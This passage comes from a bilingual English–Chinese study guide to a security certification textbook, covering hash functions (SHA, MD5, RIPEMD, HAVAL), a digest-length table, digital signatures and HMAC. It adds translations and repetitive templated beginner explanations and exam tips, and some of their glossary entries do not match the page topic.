However, a single-digit value can be used to perform the function of parity, a low-level or single-digit checksum value used to provide a single individual point of verification. In most cases, the longer the message digest, the more reliable its verification of integrity. According to RSA Security, there are five basic requirements for a cryptographic hash function: The input can be of any length. The output has a fixed length. The hash function is relatively easy to compute for any input. The hash function is one-way (meaning that it is extremely hard to determine the input when provided with the output). One-way functions and their usefulness in cryptography are described in Chapter 6.

The hash function is collision resistant (meaning that it is extremely hard to find two messages that produce the same hash value). The bottom line is that hash functions create a value that uniquely represents the data in the original message but cannot be reversed, or “de-hashed.” Access to the hashed value does not allow someone to determine what the original message contained. Access to the recipient's message, the original message's hashed value (message digest), and the hash function's identifier allows one to verify whether the message has been changed from the original.

This is done by comparing the hashed value of the original message with the hashed value of the recipient's message. If the hashes match, the hash function was run on the same input data, so the input data has not changed.

中文直译 / 整理

匹配,这意味着消息在传输过程中被以某种方式修改了。 需要注意的是,消 息必须完全一致,摘要才能匹配。 如果消息在空格、标点符号或内容上哪怕 有细微差异,消息摘要的值也会完全不同。 通过比较摘要无法判断两条消息 之间的差异程度。 即使有微小差异,也会生成完全不同的摘要值。 其次,消息摘要可用于实现数字签名算法。 这一概念将在本章后续的“数字签 名”部分中介绍。 在大多数情况下,消息摘要为128位或更长。 然而,单个数字值可用于实现奇偶 校验功能,这是一种低级别或单数字校验和值,用于提供单一的验证点。 在大 多数情况下,消息摘要越长,其完整性验证就越可靠。 根据RSA安全公司的说法,密码学哈希函数有五个基本要求: 输入可以是任意长度。 输出具有固定长度。 对于任何输入,哈希函数都相对容易计算。 哈希函数是单向的(意味着当提供输出时,几乎不可能确定输入)。 单向 函数及其在密码学中的用途在第6章。 哈希函数具有抗碰撞性(意味着几乎 难以找到两个产生相同哈希值的消息)。 总之,哈希函数会生成一个唯一表示原始消息中数据的值,但该值无法被逆向 或“反哈希”。 仅凭哈希值无法确定原始消息的内容。

通过获取接收方的消息、 原始消息的哈希值(消息摘要)以及哈希函数的标识符,可以验证消息是否已 被更改。 方法是将原始消息的哈希值与接收方消息的哈希值进行比较。 如果哈 希值匹配,则说明哈希函数作用于相同的数据输入,因此输入数据未发生改变。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
学习单元 13 / PDF P439

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

In the following sections, we'll look at some common hashing algorithms: Secure Hash Algorithm (SHA) Message Digest 5 (MD5) RACE Integrity Primitives Evaluation Message Digest (RIPEMD). Hash-Based Message Authentication Code (HMAC) is also discussed later in this chapter. In addition to SHA, MD5, RIPEMD, and HMAC, you should recognize HAVAL. Hashing Algorithm with Variable Length (HAVAL) is a modification of MD5. HAVAL uses 1,024-bit blocks and produces hash values of 128, 160, 192, 224, and 256 bits.

SHA Family The Secure Hash Algorithm (SHA) and its successors, SHA-1, SHA-2, and SHA-3, are government standard hash functions promoted by the National Institute of Standards and Technology (NIST) and are specified in an official government publication—the Secure Hash Standard (SHS), also known as Federal Information Processing Standards (FIPS) 180-4. SHA-1 takes an input of virtually any length (in reality, there is an upper bound of approximately 2,097,152 terabytes on the algorithm) and produces a 160-bit message digest. The SHA-1 algorithm processes a message in 512-bit blocks.

Therefore, if the message length is not a multiple of 512, the SHA algorithm pads the message with additional data until the length reaches the next highest multiple of 512. Cryptanalytic attacks demonstrated that there are weaknesses in the SHA-1 algorithm, and therefore, NIST deprecated SHA-1 and no longer recommends its use for any purpose, including digital signatures and digital certificates. Web browsers dropped support for SHA-1 in 2017. As a replacement, NIST announced the SHA-2 standard, which has four major variants: SHA-256 produces a 256-bit message digest using a 512-bit block size.

中文直译 / 整理

在以下部分中,我们将介绍一些常见的哈希算法: 安全哈希算法(SHA) 消息摘要5(MD5) RACE完整性原语评估消息摘要(RIPEMD)。 基于哈希的消息认证码(HMAC)将在本章后面进一步讨论。 除了SHA、MD5、RIPEMD和HMAC之外,您还应了解HAVAL。 可 变长度哈希算法(HAVAL)是MD5的修改版本。 HAVAL使用1,024位的 数据块,并生成128位、160位、192位、224位和256位的哈希值。 SHA家族 安全哈希算法(SHA)及其后续版本 SHA‑1、SHA‑2 和 SHA‑3 是由国家标 准与技术研究院(NIST)推广的政府标准哈希函数,并在官方政府出版物 《安全哈希标准》(SHS),又称联邦信息处理标准(FIPS)180‑4 中进行了 规定。 SHA‑1 接收任意长度的输入(实际上,该算法存在约 2,097,152 太字节的上限), 并生成一个 160 位的消息摘要。 SHA‑1 算法以 512 位块处理消息。 因此,如果 消息长度不是 512 的倍数,SHA 算法会通过添加额外数据对消息进行填充,直 到长度达到下一个最高的 512 的倍数。

密码分析攻击表明 SHA‑1 算法存在弱点,因此 NIST 已弃用 SHA‑1,并不再 推荐将其用于任何目的,包括数字签名和数字证书。 网络浏览器已于 2017 年 停止对 SHA‑1 的支持。 作为替代方案,NIST发布了SHA‑2标准,该标准有四个主要变体: SHA‑256 使用 512 位块大小生成 256 位消息摘要。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 14 / PDF P440

第 440 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

SHA-224 uses a truncated version of the SHA-256 hash that drops 32 bits to produce a 224-bit message digest using a 512-bit block size. SHA-512 produces a 512-bit message digest using a 1,024-bit block size. SHA-384 uses a truncated version of the SHA-512 hash that drops 128 bits to produce a 384-bit digest using a 1,024-bit block size. Although it might seem trivial, you should take the time to memorize the size of the message digests produced by each one of the hash algorithms described in this chapter. The cryptographic community generally considers the SHA-2 algorithms secure, but they theoretically suffer from the same weakness as the SHA-1 algorithm.

In 2015, the federal government announced the release of the Keccak algorithm as the SHA-3 standard. The SHA-3 family was developed to serve as a drop-in replacement for the SHA-2 family of hash functions, offering the same variants and hash lengths using a different computational algorithm. SHA-3 provides the same level of security as SHA-2, but it is slower than SHA-2, so SHA-3 is not commonly used outside of some specialized cases where the algorithm is efficiently implemented in hardware. MD5 The Message Digest 2 (MD2) hash algorithm was developed by Ronald Rivest (the same Rivest of Rivest, Shamir, and Adleman fame) in 1989 to provide a secure hash function for 8-bit processors.

In 1990, Rivest enhanced his message digest algorithm to support 32-bit processors and increase the level of security with a version called MD4. In 1992, Rivest released the next version of his message digest algorithm, which he called MD5. It also processes 512-bit blocks of the message, but it uses four distinct rounds of computation to produce a digest of the same length as the MD2 and MD4 algorithms (128 bits). MD5 has the same padding requirements as MD4—the message length must be 64 bits less than a multiple of 512 bits. MD5 implements additional security features that reduce the speed of message digest production significantly. Unfortunately, cryptanalytic attacks SHA‑224

中文直译 / 整理

使用 SHA‑256 哈希的截断版本,丢弃 32 位以生成 224 位消息摘要, 块大小为 512 位。 SHA‑512 使用 1,024 位的块大小生成一个 512 位的消息摘要。 SHA‑384 使用 SHA‑512 哈希的截断版本,丢弃 128 位以使用 1,024 位的块大小生成 384 位的摘要。 尽管这可能看起来微不足道,但您应花时间记住本章所描述的每种 哈希算法所产生的消息摘要的大小。 密码学界普遍认为 SHA‑2 算法是安全的,但它们在理论上与 SHA‑1 算法存在 相同的弱点。 2015 年,联邦政府宣布将 Keccak 算法发布为 SHA‑3 标准。 SHA‑3 家族被开发出来,旨在作为 SHA‑2 家族哈希函数的即插即用替代品, 提供相同的变体和哈希长度,但使用不同的计算算法。 SHA‑3 提供与 SHA‑2 相同的安全级别,但比 SHA‑2 更慢,因此除非在某些硬件中高效实现该算法 的特殊情况下,否则 SHA‑3 并不常用。

MD5 消息摘要算法2(MD2)由罗纳德·李维斯特(Rivest、Shamir 和 Adle man 中的同一人 Rivest)于1989年开发,旨在为8位处理器提供安全的哈希函 数。 1990年,李维斯特改进了他的消息摘要算法,以支持32位处理器,并通过 一个名为MD4的版本提高了安全性。 1992年,李维斯特发布了他消息摘要算法的下一个版本,称为MD5。 它同样 处理512位的消息块,但使用四个不同的计算轮次来生成与MD2和MD4算法相 同长度的摘要(128位)。 MD5的填充要求与MD4相同——消息长度必须比 512位的倍数少64位。 MD5 实现了额外的安全功能,显著降低了消息摘要的生成速度。 不幸的是,密码 分析攻击

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 440 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 15 / PDF P441

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

demonstrated that the MD5 protocol is subject to collisions, preventing its use for ensuring message integrity. Specifically, Arjen Lenstra and others demonstrated in 2005 that it is possible to create two digital certificates from different public keys that have the same MD5 hash. Some tools and systems still rely on MD5, so you may see it in use today, but it is now far better to rely on more secure hashing algorithms, such as SHA-2. RIPEMD The RACE Integrity Primitives Evaluation Message Digest (RIPEMD) series of hash functions is an alternative to the SHA family that is used in some applications, such as Bitcoin cryptocurrency implementations.

The family contains a series of increasingly sophisticated functions: RIPEMD produced a 128-bit digest and contained some structural flaws that rendered it insecure. RIPEMD-128 replaced RIPEMD, also producing a 128-bit digest, but it is also no longer considered secure. RIPEMD-160 is the replacement for RIPEMD-128 that remains secure today and is the most commonly used of the RIPEMD variants. It produces a 160-bit hash value. You may also see references to RIPEMD-256 and RIPEMD-320. These functions are actually based on RIPEMD-128 and RIPEMD-160, respectively. They do not add any security; they simply create longer hash values for cases where a longer value is needed.

RIPEMD-256 has the same level of insecurity as RIPEMD-128, while RIPEMD-320 has the same level of security as RIPEMD-160. This leads to the unusualsounding situation where RIPEMD-160 is secure, but RIPEMD-256 is not. Comparison of Hash Function Value Lengths Table 7.1 lists well-known hashing functions and their resultant hash value lengths in bits. Earmark this page for memorization.

中文直译 / 整理

表明 MD5 协议容易发生碰撞,因此无法用于确保消息完整性。 具体而言, Arjen Lenstra 及其他人于 2005 年证明,可以使用不同的公钥创建两个具有 相同 MD5 哈希值的数字证书。 一些工具和系统仍然依赖MD5,因此您今天仍可能看到其使用,但如今更推荐使 用更安全的哈希算法,例如SHA‑2。 RIPEMD RACE完整性原语评估消息摘要(RIPEMD)哈希函数系列是SHA家族的替 代方案,用于某些应用程序,例如比特币加密货币实现。 该系列包含一系列 日益复杂的函数: RIPEMD生成128位摘要,但存在一些结构缺陷,使其不安全。 RIPEMD‑128取代了RIPEMD,同样生成128位摘要,但也不再被认为是安全 的。 RIPEMD‑160是RIPEMD‑128的替代品,至今仍安全,是RIPEMD变体 中最常用的版本。 它生成160位哈希值。 您可能还会看到对 RIPEMD‑256 和 RIPEMD‑320 的引用。 这些函数 实际上分别基于 RIPEMD‑128 和 RIPEMD‑160。 它们并未增加任何安全性; 只是为需要更长值的情况生成更长的哈希值。

RIPEMD‑256 的不安全性与 RIPEMD‑128 相同,而 RIPEMD‑320 的安全性与 RIPEMD‑160 相同。 这 就导致了一种看似矛盾的情况:RIPEMD‑160 是安全的,但 RIPEMD‑256 却不安全。 哈希函数值长度比较 表7.1列出了常见的哈希函数及其生成的哈希值长度(以位为单位)。 请标记此 页以便记忆。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 16 / PDF P442

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

TABLE 7.1 Hash algorithm memorization chart Hash function nameHash value length (bits) HAVAL 128, 160, 192, 224, and 256 bits HMAC Variable MD5 128 SHA-1 160 SHA2-224/SHA3-224 224 SHA2-256/SHA3-256 256 SHA2-384/SHA3-384 384 SHA2-512/SHA3-512 512 RIPEMD-128 128 RIPEMD-160 160 RIPEMD-256 256 (but with equivalent security to 128) RIPEMD-320 320 (but with equivalent security to 160) Digital Signatures Once you have chosen a cryptographically sound hash function and a public key cryptographic algorithm, you can use them to implement a digital signature system.

Digital signature infrastructures have two distinct goals: Digitally signed messages assure the recipient that the message truly came from the claimed sender. They enforce nonrepudiation (that is, they preclude the sender from later claiming that the message is a forgery). Digitally signed messages assure the recipient that the message was not altered while in transit between the sender and recipient. This protects against both malicious modification (a third party altering the meaning of the message) and unintentional modification (because of faults in the communications process, such as electrical, optical, or radio frequency [RF] interference).

Digital signature algorithms rely on a combination of the two major concepts already covered in this chapter—public key cryptography and hashing

中文直译 / 整理

表 7.1 哈希算法记忆表 哈希函数名称 哈希值长度(位) HAVAL 128、160、192、224 和 256 位 HMAC 可变 MD5 128 SHA‑1 160 SHA2‑224/SHA3‑224 224 SHA2‑256/SHA3‑256 256 SHA2‑384/SHA3‑384 384 SHA2‑512/SHA3‑512 512 RIPEMD‑128 128 RIPEMD‑160 160 RIPEMD‑256 256(但安全性等同于128) RIPEMD‑320 320(但安全性等同于160) 数字签名 一旦您选择了密码学上安全的哈希函数和公钥加密算法,就可以使用它们来 实现数字签名系统。 数字签名基础设施有两个明确的目标: 数字签名的消息可确保接收者确认该消息确实来自声明的发送方。 它 们强制实现不可否认性性(即,防止发送方事后声称该消息是伪造的)。 数字签名的消息可确保接收者确认该消息在从发送方到接收方的传输过程 中未被篡改。 这可以防止恶意修改(第三方更改消息的含义)和非故意修 改(由于通信过程中的故障,例如电气、光学或射频 [RF] 干扰)。

数字签名算法依赖于本章已介绍的两个主要概念——公钥加密和哈希

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 17 / PDF P443

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

functions. If Alice wants to digitally sign a message she's sending to Bob, she performs the following actions: 1. Alice generates a message digest (i.e., hash) of the original plaintext message using one of the cryptographically sound hashing algorithms, such as SHA2-512. 2. Alice then encrypts only the message digest using her private key. This encrypted message digest is the digital signature. 3. Alice appends the signed message digest to the plaintext message. 4. Alice transmits the appended message to Bob. When Bob receives the digitally signed message, he reverses the procedure, as follows: 1. Bob decrypts the digital signature using Alice's public key. 2.

Bob uses the same hashing function to create a message digest of the full plaintext message received from Alice. 3. Bob then compares the decrypted message digest he received from Alice with the message digest he computed himself. If the two digests match, he can be assured that the message he received was sent by Alice. If they do not match, either the message was not sent by Alice or the message was modified while in transit. Digital signatures are used for more than just messages. Software vendors often use digital signature technology to authenticate code distributions that you download from the Internet, such as applets and software patches.

Note that the digital signature process does not provide confidentiality in and of itself. It only ensures that the cryptographic goals of integrity, authentication, and nonrepudiation are met. Let's break that down. If the hash generated by the sender and the hash generated by the recipient match, then we know that the two hashed messages are identical and we have integrity. If the digital signature was verified with the public key of the

中文直译 / 整理

函数。 如果爱丽丝想要对她发送给鲍勃的消息进行数字签名,她将执行以下操作: 1. Alice 使用一种密码学安全的哈希算法(如 SHA2‑512)对原始明文消 息生成消息摘要(即哈希值)。 2. 然后,Alice 使用她的私钥仅对消息摘要进行加密。 此加密后的消息摘要即 为数字签名。 3. Alice 将已签名的消息摘要附加到明文消息上。 4. Alice 将附加后的消息发送给 Bob。 当 Bob 接收到数字签名的消息时,他将按以下步骤反向执行该过程: 1. 鲍勃使用爱丽丝的公钥解密数字签名。 2. 鲍勃使用相同的哈希函数,对从爱丽丝接收到的完整明文消息生成消息摘要。 3. 随后,鲍勃将他从爱丽丝那里接收到的已解密消息摘要与他自己计算的消 息摘要进行比较。 如果两个摘要匹配,他可以确信他收到的消息是由爱丽丝 发送的。 如果它们不匹配,则表明消息并非由爱丽丝发送,或者消息在传输 过程中被修改过。 数字签名不仅用于消息。 软件供应商通常使用数字签名技术来验证 您从互联网下载的代码分发内容,例如小程序和软件补丁。 请注意,数字签名过程本身并不提供机密性。 它仅确保满足完整性、身份验证 和不可否认性性的加密目标。 让我们分解一下。

如果发送方生成的哈希值与接收 方生成的哈希值匹配,则说明两个哈希消息完全相同,我们已实现完整性。 如 果数字签名使用发送方的公钥进行了验证,

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 18 / PDF P444

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

sender, then we know that it was created using that sender's private key. That private key should be known only to the holder of the key (the sender, in this case), so the verification of the private key proves to the recipient that the digital signature came from the sender, providing origin authentication. The recipient (or anyone else) can then demonstrate that process to a third party, providing nonrepudiation. If Alice also wanted to ensure the confidentiality of her message to Bob, she could add an additional step to the message creation process. After appending the digitally signed message digest to the plaintext message, Alice could encrypt the entire message with Bob's public key.

Then, when Bob would receive the message, he would first decrypt it with his own private key before following the steps just outlined. HMAC The Hash-Based Message Authentication Code (HMAC), also known as Keyed-Hash Message Authentication Code, symmetric (secret) key algorithm implements a partial digital signature—it guarantees the integrity of a message during transmission, but it does not provide for nonrepudiation.

中文直译 / 整理

则说明该签名是使用该发送方的私钥创建的。 该私钥应仅由密钥持有者(在此 情况下为发送方)知晓,因此私钥的验证向接收方证明了该数字签名确实来自 发送方,从而提供了来源身份验证。 接收方(或任何其他人)随后可向第三方 展示这一过程,以实现不可否认性性。 如果爱丽丝还想确保她发给鲍勃的消息的机密性,她可以在消息创建过程中增 加一个额外步骤。 在将数字签名的消息摘要附加到明文消息后,爱丽丝可以用 鲍勃的公钥加密整个消息。 然后,当鲍勃收到消息时,他会先用自己的私钥解 密,再执行上述步骤。 HMAC 基于哈希的消息认证码(HMAC),又称密钥哈希消息认证码,是一种对称 (秘密)密钥算法,它实现了一个部分数字签名——它保证了消息在传输过程 中的完整性,但不提供不可否认性性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
